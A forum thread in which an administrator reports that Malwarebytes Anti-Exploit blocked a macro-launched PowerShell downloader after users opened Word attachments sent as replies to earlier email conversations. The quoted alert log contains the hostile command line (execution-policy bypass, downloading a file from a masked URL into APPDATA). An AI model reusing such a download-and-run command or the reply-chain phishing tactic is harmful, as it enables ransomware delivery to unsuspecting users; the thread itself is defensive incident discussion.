Jump to content

AE alert- i have questions

Recommended Posts

We have gotten AE alerts before. Usually harmless. However this morning multiple malicious emails came into the organization, all from same sending, and 2 users opened the attachment (word doc). I received alert below:

8/31/2017 7:00:09 AM    Computer18         Exploit payload process blocked                BLOCK                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http:\*******************.com\okas\kunkd.dat', $env:APPDATA + '\pP...


Computer name and url changed.


It looks like the word doc likely had a macro that triggered this but here is the weird thing (and maybe it isn't weird and I just haven't seen it yet). The users here who received emails all received a different email (with bad file attached) that was a reply to previous email conversations. I've not seen that before. The body of each email was the same but was phrased in a way that fooled multiple users, due to language that is pretty spot on for our industry.


Can anyone tell me what this is that was blocked, and if the particular of the email being a reply to a previous email is new?

Malwarebytes Anti-Exploit.zip

Share this post

Link to post
Share on other sites

That's one of the tactics the latest ransomware malspam campaigns are using. That's a legit block of an attack. It was blocked before the powershell payload could even run (and before the ransomware was even attempted to be downloaded into the endpoints).




Share this post

Link to post
Share on other sites

Thanks Pedro. I have to say- no amount of user training is going to beat this. It was shockingly good. Going to have to continue improving protections. If this becomes the norm, its a whole new ball game. Absolutely none of the typical signs of it being false.

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.